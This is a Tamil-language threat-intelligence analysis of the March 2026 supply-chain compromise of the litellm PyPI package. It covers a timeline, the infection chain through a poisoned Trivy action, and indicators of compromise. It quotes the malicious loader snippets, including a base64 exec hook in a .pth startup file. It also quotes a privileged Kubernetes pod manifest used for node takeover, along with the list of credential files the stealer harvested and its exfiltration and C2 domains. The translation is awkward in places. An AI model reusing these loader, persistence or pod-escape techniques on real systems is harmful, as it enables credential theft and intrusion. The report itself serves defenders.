ஏன் திஸ் மேட்டர்ஸ்
மார்ச் 24, 2026 அன்று, பிரபலமான பைதான் தொகுப்பு லிடெல்ம்ஆயிரக்கணக்கானோரால் பயன்படுத்தப்படும் ஒரு உலகளாவிய LLM ப்ராக்ஸி கேட்வே enterpriseOpenAI, Anthropic, Google மற்றும் AWS Bedrock போன்ற AI வழங்குநர்களுக்கும் செயலிகளுக்கும் இடையில் போக்குவரத்தை வழிநடத்துவதற்கான ஒரு மென்பொருள், PyPI-இல் யாருக்கும் தெரியாமல் ஊடுருவப்பட்டது. விஷம் கலந்த இரண்டு பதிப்புகள் (1.82.7 மற்றும் 1.82.8) ஒன்றுக்கொன்று 13 நிமிட இடைவெளியில் வெளியிடப்பட்டன. அவை, பயனர் சான்றுகளைத் திருடி, கிளவுட் இரகசியங்களை வெளியேற்றி, Kubernetes கிளஸ்டர்கள் முழுவதும் பரவி, தொலைநிலை குறியீடு செயல்படுத்தும் திறன்களுடன் ஒரு நீடித்த பின்கதவையும் நிறுவிய பல-கட்ட பேலோடைக் கொண்டிருந்தன.
தோராயமாக தினசரி 3.6 மில்லியன் பதிவிறக்கங்கள் கிளவுட்-நேட்டிவ் AI உள்கட்டமைப்பு முழுவதும் ஆழமாகப் பயன்படுத்தப்படுவதால், நவீன தாக்குதல் நடத்துபவர்கள் விரும்பும் அனைத்தின் மையத்திலும் லிடெல்ம் அமைந்துள்ளது: ஒவ்வொரு முக்கிய AI வழங்குநருக்கான API விசைகள், கிளவுட் IAM நற்சான்றுகள், குபெர்னெட்டஸ் இரகசியங்கள் மற்றும் SSH விசைகள்.
ஆனால், அந்தச் சிறு சமரசம் ஒரு தனிப்பட்ட நிகழ்வல்ல. அது ஒரு தொடர் நிகழ்வின் உச்சக்கட்டமாக இருந்தது. ஐந்து நாள், ஐந்து சூழல் மண்டல பிரச்சாரம் அச்சுறுத்தல் செய்பவர் என அறியப்படுபவர் டீம்பிசிபிமுதலில் பாதுகாப்பு ஸ்கேனர்களுக்கு (Aqua Trivy, Checkmarx KICS) நஞ்சூட்டி, பின்னர் திருடப்பட்டவற்றைப் பயன்படுத்திய ஒரு பிரச்சாரம். CI/CD அங்கீகாரத் தகவல்களை npm, OpenVSX, இறுதியாக PyPI ஆகியவற்றிற்குப் பரப்பினர். நிறுவனங்கள் தங்கள் விநியோகச் சங்கிலிகளைப் பாதுகாக்க நம்பியிருக்கும் கருவிகளையே தாக்குதல் நடத்தியவர்கள் ஆயுதமாக்கினர்.
இந்தத் தாக்குதல், விநியோகச் சங்கிலி அச்சுறுத்தல்களின் நுட்பத்தில் ஒரு பெரும் மாற்றத்தைக் குறிக்கிறது. பல படிநிலைகளைக் கொண்ட, சூழல் மண்டலங்களைக் கடக்கும் இந்த வடிவமைப்பு, உயர் மதிப்புள்ள பொருட்களை அடைவதற்காகப் பாதுகாப்பு கருவிகளையே சமரசம் செய்கிறது. செயற்கை நுண்ணறிவு உள்கட்டமைப்பு, இது, பெருகிவரும் வணிகமயமாக்கப்பட்ட தாக்குதல் கருவிகளுக்கு ஏற்ப, ஒரு குறிப்பிட்ட அளவிலான திட்டமிடலையும் செயல்பாட்டு முதிர்ச்சியையும் பிரதிபலிக்கிறது. பேலோடுகள் நிகழ்நேரத்தில் மீண்டும் மீண்டும் உருவாக்கப்பட்டன (மூலக் குறியீட்டில் மூன்று பேலோடு வகைகள் காணப்படுகின்றன, அவற்றில் கருத்துரைக்கப்பட்ட முந்தைய பதிப்புகளும் அடங்கும்), தாக்குதலுக்கு முந்தைய நாள் C2 உள்கட்டமைப்பு பதிவு செய்யப்பட்டது, மேலும் முறையான விற்பனையாளர் உள்கட்டமைப்பைப் போலவே செயல்படுமாறு தரவுக் கசிவு டொமைன்கள் கவனமாகத் தேர்ந்தெடுக்கப்பட்டன. கார்டானோ கையொப்பமிடும் சாவிகள் மற்றும் வயர்கார்டு உள்ளமைவுகள் போன்ற குறிப்பிட்ட இலக்குகள் உட்பட 15-க்கும் மேற்பட்ட வகைகளை உள்ளடக்கிய, முறையாக விரிவான இந்த நற்சான்றிதழ் சேகரிப்பான், செயற்கை நுண்ணறிவு உதவியுடன் உருவாக்கப்பட்ட தீம்பொருள் ஒரு சக்தி பெருக்கியாகச் செயல்பட்டிருக்கலாம் என்பதைச் சுட்டிக்காட்டும் ஒரு முழுமையான செயல்பாட்டைக் காட்டுகிறது.
காலக்கெடு
| தேதி (UTC) | நிகழ்வு |
|---|---|
| மார்ச் 19 | TeamPCP, Aqua Trivy GitHub Action குறிச்சொற்களைச் சிதைத்து, அவற்றிற்குப் பதிலாகத் தரவுகளை வெளியேற்றும் தீங்கிழைக்கும் குறியீட்டை இடுகிறது. CI/CD கீழ்நிலை களஞ்சியங்களிலிருந்து வரும் இரகசியங்கள் |
| மார்ச் 21 | இதே போன்ற நுட்பங்களைப் பயன்படுத்தி, செக்மார்க்ஸ் கேஐசிஎஸ் மற்றும் ஏஎஸ்டி கிட்ஹப் ஆக்சன்ஸ்களுக்கும் இந்த சமரசம் நீட்டிக்கப்படுகிறது. |
| மார்ச் 22, 06:35 | BerriAI சாதாரணமாக litellm 1.82.6 (கடைசி சுத்தமான பதிப்பு) வெளியிடுகிறது CI/CD pipeline பாதுகாப்பு ஸ்கேனிங்கிற்காக ட்ரிவியைப் பயன்படுத்தும் |
| மார்ச் 23 | TeamPCP, models.litellm.cloud (தரவு கசிவு டொமைன்) -ஐப் பதிவு செய்கிறது. இது 66-க்கும் மேற்பட்ட npm தொகுப்புகள் மற்றும் OpenVSX நீட்டிப்புகளின் பாதுகாப்பை மீறுகிறது. |
| மார்ச் 24, 10:39 | litellm 1.82.7 PyPI-இல் வெளியிடப்பட்டது -- பேலோட் உட்செலுத்தப்பட்டது proxy_server.py தொகுதி வரம்பில். இறக்குமதியின் போது செயல்படுத்தப்படும். |
| மார்ச் 24, 10:52 | litellm 1.82.8, 13 நிமிடங்கள் கழித்து வெளியிடப்பட்டது -- சேர்க்கிறது litellm_init.pthஇது, litellm இறக்குமதிகளின் போது மட்டுமல்லாமல், ஒவ்வொரு பைதான் மொழிபெயர்ப்பி தொடக்கத்தின் போதும் இயங்கும் ஒரு பைதான் பாதை உள்ளமைவு இணைப்பு ஆகும். இது விரைவான தரவுப் பொதி செயலாக்கத்தைக் காட்டுகிறது. |
| மார்ச் 24, ~16:00 | சமூகப் புகார்களுக்குப் பிறகு PyPI இரண்டு பதிப்புகளையும் நீக்கிவிடுகிறது. பதிப்புகள் குறியீட்டிலிருந்து முழுமையாக நீக்கப்படுகின்றன (திடீரென அகற்றப்படுவதில்லை), இருப்பினும் CDN டார்பால்கள் தொடர்ந்து அணுகக்கூடியதாகவே இருக்கும். |
ஒளிக்கால அளவு: சுமார் 5.5 மணி நேரம். இந்த நேரத்தில், எந்தவொரு pip install litellm, pip install --upgrade litellm, அல்லது CI/CD pipeline சமீபத்திய பதிப்பைப் பதிவிறக்கியிருந்தால், அந்த பேலோட் இயக்கப்பட்டிருக்கும்.
தீம்பொருள் எப்படி ஊடுருவியது: தொடர் பாதிப்பு
litellm தொகுப்பு நேரடியாக ஊடுருவப்படவில்லை. தாக்குதல் நடத்தியவர் அதனை ஒரு வழிமுறையின் மூலம் அடைந்தார். இரு-தாண்டல் விநியோகச் சங்கிலித் தாக்குதல்:
Aqua Trivy GitHub Action (compromised March 19) --> LiteLLM CI/CD pipeline runs Trivy without pinned version --> Malicious Trivy exfiltrates PYPI_PUBLISH token from GitHub Actions runner --> Attacker publishes poisoned litellm 1.82.7 and 1.82.8 directly to PyPI லைட்எல்எல்எம்-இன் CI/CD pipeline பாதுகாப்புக் குறைபாடுகளைக் கண்டறிய வடிவமைக்கப்பட்ட கருவியான டிரிவியை ஒரு பாதுகாப்பு ஸ்கேனராகப் பயன்படுத்தியதால், அதுவே தாக்குதலுக்கான ஊடகமாகவும் மாறியது. ஏனெனில், pipeline பின் செய்யப்பட்ட குறிச்சொல்லுக்குப் பதிலாக மாற்றக்கூடிய குறிச்சொல் மூலம் டிரிவியைக் குறிப்பிட்டது commit SHA எனும் சமரசம் செய்யப்பட்ட செயல்பாடு தானாகவே இயங்கியது. தீங்கிழைக்கும் டிரிவி செயல்பாடு, சூழல் இரகசியங்களை கசியவிட்டது, அவற்றுள் அடங்குபவை: PYPI_PUBLISH டோக்கன், இது டீம்பிசிபி-க்கு லிட்டெல்ம் பைபிஐ திட்டத்தில் நேரடி வெளியீட்டு அணுகலை வழங்குகிறது.
இந்த “பாதுகாப்புக் கருவிகளைச் சீர்குலைக்கும்” உத்தி, டீம்பிசிபி பிரச்சாரத்தின் ஒரு முக்கிய அம்சமாகும். பாதுகாப்பு கருவிகளை (ட்ரிவி, செக்மார்க்ஸ் கேஐசிஎஸ்) முதலில் குறிவைப்பதன் மூலம், தாக்குதல் நடத்தியவர்கள் ஒரே நேரத்தில் கண்டறிதலை முடக்கி, கீழ்நிலை விநியோகச் சங்கிலிகளுக்கு சிறப்புரிமை பெற்ற அணுகலைப் பெற்றனர்.
தொழில்நுட்ப பகுப்பாய்வு: பேலோட்
ஊசி போடும் இடங்கள்
பதிப்பு 1.82.7 — தொகுதி-நிலை செயலாக்கம் litellm/proxy/proxy_server.py (வரி 128):
import subprocess, base64, sys, tempfile, os b64_payload = "<~12KB base64 blob>" with tempfile.TemporaryDirectory() as d: p = os.path.join(d, "p.py") with open(p, "wb") as f: f.write(base64.b64decode(b64_payload)) subprocess.run([sys.executable, p]) இந்தக் குறியீடு, ஒரு அகராதி மாறிலிக்கும் அசல் குறியீட்டிற்கும் இடையில் தொகுதி எல்லைக்குள் அமைந்துள்ளது. showwarning() செயல்பாடு. இது உடனடியாகச் செயல்படும். litellm.proxy.proxy_server இறக்குமதி செய்யப்படுகிறது — இது litellm-இன் ப்ராக்ஸி செயல்பாட்டைப் பயன்படுத்தும் போதெல்லாம் நிகழ்கிறது.
பதிப்பு 1.82.8 — சேர்க்கப்பட்டது litellm_init.pth (பைதான் பாதை உள்ளமைவு கோப்பு):
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('...'))"], ...) பைதான் .pth கோப்புகள் site-packages/ ஒவ்வொரு மொழிபெயர்ப்பி தொடக்கத்தின்போதும் செயலாக்கப்படுகின்றன, ஆனால் தொடங்கும் வரிகள் மட்டுமே import இவை குறியீடாகச் செயல்படுத்தப்படுகின்றன. தாக்குபவர் முழு பேலோடையும் ஒரே நிரலில் சங்கிலித் தொடராக இணைப்பதன் மூலம் இதைச் சாதகமாகப் பயன்படுத்திக்கொள்கிறார். import அறிக்கை: import os, subprocess, sys; subprocess.Popen(...)இது proxy_server.py ஊடுருவலை விட மிகவும் தீவிரமானது — litellm ஒருபோதும் இறக்குமதி செய்யப்படாவிட்டாலும், ஒவ்வொரு பைதான் செயல்முறை தொடங்கப்படும்போதும் இது செயல்படுகிறது. pyproject.toml விநியோகத்தில் இந்தக் கோப்பைச் சேர்க்கும் வகையில் மாற்றியமைக்கப்பட்டது:
include = [ { path = "litellm_init.pth", format = ["sdist", "wheel"] } ] பதிப்பு 1.82.8 இவ்வாறு கொண்டுள்ளது இரண்டு சுயாதீனமான செயல்படுத்தும் பாதைகள்: proxy_server.py ஊடுருவல் (litellm proxy இறக்குமதியின் போது செயல்படுகிறது) மற்றும் .pth கோப்பு (எந்தவொரு பைதான் தொடக்கத்திலும் செயல்படுகிறது). இந்த மிகைத்தன்மையே குறிப்பிடத்தக்கது — இது இந்த இரண்டு பாதைகளில் ஏதேனும் ஒன்றை மட்டும் கண்டறிவதிலிருந்தோ அல்லது அகற்றுவதிலிருந்தோ பாதுகாக்கிறது. 1.82.7 பதிப்பு வெளியான 13 நிமிடங்களுக்குப் பிறகு, இறக்குமதி நேரத்திலிருந்து தொடக்க நேரச் செயலாக்கத்திற்கு இது தீவிரமடைந்தது, தாக்குதல் நடத்தியவர் வரிசைப்படுத்தலின் வெற்றியை கண்காணித்து, விரைவாக மாற்றங்களைச் செய்து கொண்டிருந்தார் என்பதைக் காட்டுகிறது.
நிலை 1: விரிவான சான்று சேகரிப்பு
குறியீடு நீக்கப்பட்ட உள் ஸ்கிரிப்ட் என்பது ஒரு நுணுக்கமான சான்று வெற்றிடமாகும். அது பயன்படுத்துகிறது os.walk(), glob.glob(), subprocess.check_output()மேலும், முழு அமைப்பையும் சல்லடை போட்டுத் தேடுவதற்கான நேரடி கோப்பு வாசிப்புகளும்:
| பகுப்பு | இலக்குகள் |
|---|---|
| அமைப்பு உளவு | hostname, whoami, uname -a, ip addr, printenv, ip route |
| எஸ்எஸ்ஹெச்சில் | ~/.ssh/id_rsa, id_ed25519, id_ecdsa, authorized_keys, known_hosts, config; ஹோஸ்ட் விசைகள் /etc/ssh/ |
| கிளவுட் (AWS) | ~/.aws/credentials, ~/.aws/configIMDS பங்குச் சான்றுகள் வழியாக 169.254.169.254இரகசிய மேலாளர் ListSecretsஎஸ்எஸ்எம் DescribeParameters |
| கிளவுட் (ஜிசிபி) | ~/.config/gcloud/ (மீள்சுழற்சி); $GOOGLE_APPLICATION_CREDENTIALS |
| கிளவுட் (அஸூர்) | ~/.azure/ (மீள்சுழற்சி); சூழல் மாறிகள் |
| Kubernetes | சேவைக் கணக்கு டோக்கன்கள்; ca.crt; பெயர்வெளி; kubectl get secrets --all-namespacesஅனைத்து இரகசியங்களும் K8s API வழியாக |
| சுற்றுச்சூழல் கோப்புகள் | .env, .env.local, .env.production, .env.development, .env.staging — முழுவதும் மீள்சுழற்சி முறையில் (ஆழம் 6) தேடப்பட்டது /home, /root, /opt, /srv, /var/www, /app, /data, /tmp |
| கூலியாள் | ~/.docker/config.json, /kaniko/.docker/config.json |
| தொகுப்பு டோக்கன்கள் | ~/.npmrc, ~/.vault-token, ~/.netrc |
| தரவுத்தளங்கள் | ~/.pgpass, ~/.my.cnf, /etc/mysql/my.cnf, /etc/redis/redis.confMongoDB உள்ளமைவுகள் |
| டி.எல்.எஸ் / எஸ்.எஸ்.எல் | தனிப்பட்ட சாவிகள் /etc/ssl/private/லெட்ஸ் என்க்ரிப்ட் சான்றிதழ்கள், அனைத்தும் .pem/.key/.p12/.pfx கோப்புகளை |
| Git தகவல் | ~/.git-credentials, ~/.gitconfig |
| CI/CD | terraform.tfvars, terraform.tfstate, .gitlab-ci.yml, Jenkinsfile, ansible.cfg |
| கிரிப்டோ பணப்பைகள் | பிட்காயின், எத்தேரியம் கீஸ்டோர், சோலானா கீபேர்கள் (வேலிடேட்டர், வோட், ஸ்டேக், ஃபாசெட்), கார்டானோ சைனிங் கீஸ், லைட்காயின், டோஜ்காயின், இச்கேஷ், டாஷ், ரிப்பிள், மொனெரோ |
| ஷெல் வரலாறு | .bash_history, .zsh_history, .mysql_history, .psql_history, .rediscli_history |
| கணினி அங்கீகாரம் | /etc/passwd, /etc/shadow, அங்கீகாரப் பதிவுகள் (ஏற்கப்பட்ட SSH அமர்வுகள்) |
| வெப்ஹூக்/ஏபிஐ விசைகள் | ஸ்லாக் வலைத்தளத்திற்கான கிரெப்hooks, டிஸ்கார்ட் வலைhooksஉள்ளமைவு கோப்புகளில் உள்ள API சாவிகள்/இரகசியங்கள் |
| மெ.த.பி.க்குள்ளேயே | WireGuard உள்ளமைவுகள் /etc/wireguard/ |
இந்தத் தரவு சேகரிப்பானின் வீச்சு ஒரு கலைக்களஞ்சியம் போன்றது. இது கிளவுட் நற்சான்றிதழ்களை மட்டுமல்லாமல், கிரிப்டோகரன்சி வாலெட்டுகள், தரவுத்தள கடவுச்சொற்கள், VPN உள்ளமைவுகள் மற்றும் பலவற்றையும் குறிவைக்கிறது. CI/CD ரகசியங்கள் — இவை, தாக்குதல் நடத்தியவர் ஊடுருவப்பட்ட கணினி அமைப்புகள் மூலம் பல்வேறு வழிகளில் பணம் சம்பாதிக்க எண்ணுகிறார் என்பதை உணர்த்துகின்றன.
நிலை 2: மறைகுறியாக்கப்பட்ட வெளியேற்றம்
திருடப்பட்ட தரவுகள், ஒரு கலப்பின மறைகுறியாக்கத் திட்டத்தைப் பயன்படுத்தி மறைகுறியாக்கம் செய்யப்பட்டு வெளியேற்றப்படுகின்றன:
- AES-256-CBC சேகரிக்கப்பட்ட அனைத்து தரவுகளையும் ஒரு சமவாய்ப்பு 32-பைட் அமர்வு திறவுகோல் மூலம் குறியாக்கம் செய்தல் (வழியாக)
openssl enc) - ஆர்எஸ்ஏ-4096 தாக்குபவரின் உட்பொதிக்கப்பட்ட பொது விசையைப் பயன்படுத்தி அமர்வு விசையை மறைகுறியாக்கம் செய்தல் (OAEP பேடிங், வழியாக)
openssl pkeyutl) - இரண்டு மறைக்குறியீட்டு கோப்புகளும் தொகுக்கப்பட்டுள்ளன
tpcp.tar.gz(tpcp(பிரச்சாரத்தின் முழுவதும் “TeamPCP” என்ற முன்னொட்டு தொடர்ந்து இடம்பெறுகிறது) - HTTPS POST க்கு
https://models.litellm.cloud/உடன்Content-Type: application/octet-stream
களம் models.litellm.cloud இது, தாக்குதலுக்கு ஒரு நாள் முன்னதாக, மார்ச் 23 அன்று பதிவு செய்யப்பட்டது. மேலும், இது முறையான லிட்டெல்ம் உள்கட்டமைப்புடன் (உண்மையான திட்டம் பயன்படுத்துவது) இயைந்துபோகும் வகையில் வடிவமைக்கப்பட்டுள்ளது. litellm.aiவெளியேறும் டிராஃபிக்கை மதிப்பாய்வு செய்யும், நெட்வொர்க்கைப் பற்றி அறிந்த ஒரு டிஃபென்டர் கூட, லிட்டெல்மின் சொந்த மாடல் எண்ட்பாயிண்ட்டாகத் தோன்றும் இடத்திற்கான டிராஃபிக்கைக் கொடியிடாமல் போகலாம்.
நிலை 3: நீடித்த பின்கதவு (sysmon.py)
அந்த பேலோட், சிஸ்டம் டெலிமெட்ரி போல வேடமிட்டு, ஒரு போலிங் பேக்டோர்-ஐ நிறுவுகிறது:
- பாதை:
~/.config/sysmon/sysmon.py - சேவை:
sysmon.service(systemd பயனர் அலகு, “சிஸ்டம் டெலிமெட்ரி சேவை” என விவரிக்கப்படுகிறது) - நடத்தைஆரம்ப 300 வினாடி உறக்கத்திற்குப் பிறகு, வாக்கெடுப்புகள்
https://checkmarx.zone/rawஒவ்வொரு ~50 நிமிடங்களுக்கும் - மரணதண்டனைC2 ஆல் திருப்பி அனுப்பப்பட்ட URL ஐ இதற்குப் பதிவிறக்குகிறது:
/tmp/pglog, அதை இயக்கக்கூடியதாக அமைக்கிறது (chmod 755), அதை ஒரு பிரிக்கப்பட்ட அமர்வில் இயக்குகிறது - நிலை கண்காணிப்பு:
/tmp/.pg_stateஒரே பேலோடை மீண்டும் பதிவிறக்கம் செய்வதைத் தடுக்கிறது - நிலைத்தன்மையே:
Restart=always,RestartSec=10செயலிழப்புகள் மற்றும் மறுதொடக்கம் ஆகியவற்றைத் தாங்கி நிற்கிறது
களம் checkmarx.zone இது செக்மார்க்ஸ் (பாதுகாப்பு நிறுவனம்) என்பதன் எழுத்துப்பிழை ஆகும். checkmarx.comநெட்வொர்க் பதிவுகளை மதிப்பாய்வு செய்யும் SOC ஆய்வாளர்கள், முறையான பாதுகாப்பு விற்பனையாளர் போலத் தோற்றமளிக்கும் ஒரு தளத்திற்குச் செல்லும் தரவுப் போக்குவரத்தைக் காணும் வகையில் இது வடிவமைக்கப்பட்டுள்ளது. இது, பாதுகாப்பு விற்பனையாளர் அடையாளத்தின் பின்னால் ஒளிந்துகொள்ளும் TeamPCP-யின் பரந்த உத்திக்கு இசைவான, ஒரு திட்டமிட்ட தவிர்ப்பு நுட்பமாகும்.
நிலை 3b: குபர்நெட்டஸ் பக்கவாட்டு நகர்வு
பாதிக்கப்பட்ட கணினியில் குபெர்னெட்டஸ் சேவை கணக்குச் சான்றுகள் இருந்தால், அந்த தீம்பொருள் அனைத்து கிளஸ்டர் முனைகளையும் பட்டியலிட்டு அவற்றை நிலைநிறுத்துகிறது. சிறப்புரிமை பெற்ற பாட்கள் ஒவ்வொருவருக்கும்:
pod_manifest = { 'apiVersion': 'v1', 'kind': 'Pod', 'metadata': {'name': f'node-setup-{node_name[:35]}', 'namespace': 'kube-system'}, 'spec': { 'nodeName': node_name, 'hostPID': True, 'hostNetwork': True, 'tolerations': [{'operator': 'Exists'}], 'containers': [{ 'name': 'setup', 'image': 'alpine:latest', 'command': ['sh', '-c', drop_cmd], 'securityContext': {'privileged': True}, 'volumeMounts': [{'name': 'host', 'mountPath': '/host'}] }], 'volumes': [{'name': 'host', 'hostPath': {'path': '/'}}], 'restartPolicy': 'Never' } } ஒவ்வொரு தொகுப்பும்:
- இயங்கும்போது சலுகை பெற்ற உடன்
hostPID,hostNetworkமற்றும் முழுமையான ஹோஸ்ட் கோப்பு முறைமை அணுகல் - பயன்கள்
chroot /hostஅதையே நிறுவsysmon.pyஹோஸ்டின் ரூட் கோப்பு முறைமையில் பின்கதவு - இதை ஒரு systemd சேவையாகப் பதிவுசெய்து, பாட் நீக்கப்பட்ட பிறகும் அதன் நிலைத்தன்மை நீடிப்பதை உறுதிசெய்கிறது.
- என்ற
node-setup-*உள்ளkube-systemமுறையான கிளஸ்டர் உள்கட்டமைப்பாகத் தோன்றுவதற்கான நேம்ஸ்பேஸ்
இதன் பொருள் ஒரு ஒற்றை சமரசம் CI/CD K8s அணுகல் கொண்ட ஒரு ரன்னர், கிளஸ்டரில் உள்ள ஒவ்வொரு நோடும் பின்கதவு வழியாகத் தாக்கப்படுவதற்கு வழிவகுக்கலாம். Kubernetes-இல் litellm-ஐ ஒரு ப்ராக்ஸியாக இயக்கும் நிறுவனங்களுக்கு ஏற்படக்கூடிய ஒரு பேரழிவு தரும் பக்கவாட்டு நகர்வுச் சூழல்.
பேலோட் பரிணாமம் (கருத்துரையிடப்பட்ட வகைகள்)
மூலக் குறியீட்டின் 131-132 வரிகளில், கருத்துரை இடப்பட்ட இரண்டு முந்தைய பேலோட் வகைகள் உள்ளன, அவை தாக்குதல் நடத்தியவரின் உருவாக்கச் செயல்முறையை வெளிப்படுத்துகின்றன:
- மூன்று வகைகளும் ஒரே தரவு கசிவு உள்கட்டமைப்பைப் பகிர்ந்து கொள்கிறது (
models.litellm.cloud), RSA-4096 பொதுத் திறவுகோல், AES-256-CBC + RSA கலப்பின மறைகுறியாக்க உறை, மற்றும்tpcp.tar.gzமூட்டை பெயரிடுதல் - முந்தைய வகைகள் பார்த்தார் RC4 குறியாக்க அடுக்கு தரவு சேகரிப்பு ஸ்கிரிப்ட்டின் உள்ளே, வெளிப்புற AES+RSA உறைக்கு முன்பாக சேகரிக்கப்பட்ட தரவு குறியாக்கம் செய்யப்படுகிறது. இந்த உள் RC4 அடுக்கை அகற்றுவதன் மூலம், செயலில் உள்ள பேலோட் (வரி 130) எளிமையாக்கப்பட்டுள்ளது.
- முந்தைய வகைகள் பயன்படுத்துகின்றன
exec()உடன்StringIOசெயலில் உள்ள பேலோட் பயன்படுத்தும் போது, கலெக்டரை இன்-பிராசஸில் இயக்க கேப்சர் செய்யவும்.subprocess.run()stdout வழிமாற்றத்துடன் — இது ஹோஸ்ட் செயல்முறையை மாசுபடுத்துவதைத் தவிர்க்கும் ஒரு தெளிவான பிரிப்பு முறையாகும். - மூன்று வகைகளும் ஒரே சான்றளிப்புப் பிரிவுகளையும் சேகரிப்பு வழிகளையும் இலக்காகக் கொண்டுள்ளன.
- முந்தைய பதிப்புகளில் இருந்த RC4 விசை, டெலிகிராமில் அந்த நடிகரின் கவன ஈர்ப்பு நடத்தைக்கு ஏற்ப, ஆத்திரமூட்டும் ஒரு இழிசொல்லாக இருந்தது.
செயல்பாட்டின் போது தீவிரமான வளர்ச்சி நிகழ்ந்ததை இது வெளிப்படுத்துகிறது. தாக்குதல் நடத்தியவர், தரவு சேகரிப்பு இலக்குகளையும் தரவு கசிவு உள்கட்டமைப்பையும் நிலையாக வைத்திருந்தவாறே, குறியாக்க அடுக்கை எளிமையாக்கி, செயலாக்கத் தனிமைப்படுத்தலை மேம்படுத்தியுள்ளார்.
சமரசக் குறிகாட்டிகள் (IOCs)
பிணையம்
| காட்டி | வகை | நோக்கம் |
|---|---|---|
models.litellm.cloud | டொமைன் | வெளியேற்ற முனைப்புள்ளி (HTTPS POST) |
checkmarx.zone | டொமைன் | C2 வாக்கெடுப்பு முனையம் (HTTPS GET) /raw) |
குறிப்பு: வெளிப்புற அறிக்கையிடல் இணைப்புகள் checkmarx.zone/static/checkmarx-util-1.0.4.tgz TeamPCP பிரச்சாரத்தின் முந்தைய KICS கட்டத்திற்கு. இங்கு பகுப்பாய்வு செய்யப்பட்ட litellm பேலோடுகளில் இந்த URL காணப்படவில்லை.
தொகுப்பு ஹாஷ்கள்
| கோப்பு | SHA256 |
|---|---|
litellm-1.82.7.tar.gz | 8a2a05fd8bdc329c8a86d2d08229d167500c01ecad06e40477c49fb0096efdea |
litellm-1.82.8.tar.gz | d39f4e7a218053cce976c91eacf184cf09a6960c731cc9d66d8e1a53406593a5 |
கோப்பு முறை
| காட்டி | வகை | நோக்கம் |
|---|---|---|
~/.config/sysmon/sysmon.py | கோப்பு | தொடர்ச்சியான பின்கதவு ஸ்கிரிப்ட் |
~/.config/systemd/user/sysmon.service | கோப்பு | சிஸ்டம்ட் நிலைத்தன்மை அலகு |
/tmp/pglog | கோப்பு | இரண்டாம் கட்ட பைனரி பதிவிறக்கம் செய்யப்பட்டது |
/tmp/.pg_state | கோப்பு | C2 நிலை கண்காணிப்பு |
litellm_init.pth in site-packages/ | கோப்பு | பைதான் ஸ்டார்ட்அப் ஹூக் (v1.82.8 பதிப்பிற்கு மட்டும்) |
tpcp.tar.gz | கோப்பு | மறைகுறியாக்கம் செய்யப்பட்ட வெளியேற்றக் கட்டு |
Kubernetes
| காட்டி | வகை | நோக்கம் |
|---|---|---|
node-setup-* காய்களில் kube-system | பாட் | சிறப்புரிமை பெற்ற பக்கவாட்டு இயக்கப் பெட்டகங்கள் |
sysmon.service கிளஸ்டர் முனைகளில் | சேவை | பாட் எஸ்கேப் வழியாக ஹோஸ்ட்-நிலை நிலைத்தன்மை |
குறியாக்கவியல்
| காட்டி | விவரங்கள் |
|---|---|
| தாக்குதல் நடத்தியவர் RSA-4096 பொது சாவி | SHA256 கைரேகை: bc40e5e2c438032bac4dec2ad61eedd4e7c162a8b42004774f6e4330d8137ba8மூன்று பேலோட் வகைகளிலும் உட்பொதிக்கப்பட்டுள்ளது; மற்ற TeamPCP செயல்பாடுகளிலும் அதே சாவி தெரிவிக்கப்படுகிறது. |
tpcp கலைப்பொருட்களில் முன்னொட்டு | தொகுப்பு பெயரிடும் மரபு (tpcp.tar.gzபிரச்சாரம் முழுவதும் சீராக |
நன்றி: டீம்பிசிபி
இந்த நடவடிக்கையின் பின்னணியில் உள்ள அச்சுறுத்தல் காரணி பின்வருமாறு கண்காணிக்கப்படுகிறது: டீம்பிசிபி, PCPcat, Persy_PCP, ShellForce, மற்றும் DeadCatx3 என்றும் அழைக்கப்படுகிறது.
அறியப்பட்ட பண்புகள்:
- டெலிகிராம் சேனல்களைப் பராமரிக்கிறது
@Persy_PCPமற்றும்@teampcpஅவர்கள் பாதுகாப்பு நிறுவனங்களைக் கேலி செய்த இடத்தில் - பல்வேறு சூழலமைப்புகளில் (GitHub Actions, PyPI, npm, OpenVSX) இயங்குகிறது.
- பிரச்சாரத்தின் ஒவ்வொரு கட்டத்திற்கும் விற்பனையாளர் சார்ந்த டைபோஸ்க்வாட் டொமைன்களைப் பயன்படுத்துகிறது (எ.கா.,
checkmarx.zoneசெக்மார்க்ஸைப் பொறுத்தவரை,models.litellm.cloud(லிட்டெல்ம் என்பதற்கு) - சீரான உள்கட்டமைப்பு அடையாளங்கள்: ஒரே RSA திறவுகோல் ஜோடி,
tpcp.tar.gzபெயரிடும் மரபு,tpcp-docs-*டெட்-டிராப் ஸ்டேஜிங்காகப் பயன்படுத்தப்படும் கிட்ஹப் களஞ்சியங்கள் - கீழ்நிலை விநியோகச் சங்கிலிகளுக்கான நுழைவாயில்களாகப் பாதுகாப்புக் கருவிகளைக் குறிவைக்கிறது
பண்புக்கூறு நம்பகத்தன்மை: அதிகம். பகிரப்பட்ட RSA பொதுத் திறவுகோல், tpcp ஐந்து நாள் பிரச்சாரத்தின் போது ஆர்டிஃபேக்ட் பெயரிடல், C2 உள்கட்டமைப்பு மேலடுக்கு மற்றும் செயல்பாட்டு வேகம் ஆகியவை Trivy, KICS, npm, OpenVSX மற்றும் litellm ஆகியவற்றின் சமரசங்களை ஒரே தரப்பினருடன் வலுவாக இணைக்கின்றன.
உள்நோக்கம்பெரும்பாலும் இது நிதி சார்ந்ததாகவும் (கிரிப்டோ வாலட் திருட்டு, கிளவுட் சான்றுகளைப் பணமாக்குதல்) மற்றும் பெயர்போனதாகவும் (டெலிகிராம் கேலி) இருக்கலாம். AWS IAM முதல் சோலானா வேலிடேட்டர் கீபேர்கள், வயர்கார்டு உள்ளமைவுகள் வரை சான்றுகளைத் திருடும் பரந்த செயல்பாடானது, ஒவ்வொரு முறை நிகழும் முறைகேட்டிலிருந்தும் முதலீட்டின் மீதான வருவாயை (ROI) அதிகரிக்க விரும்பும் ஒரு நிதி நோக்கம் கொண்ட நபர் செயல்படுவதைச் சுட்டிக்காட்டுகிறது.
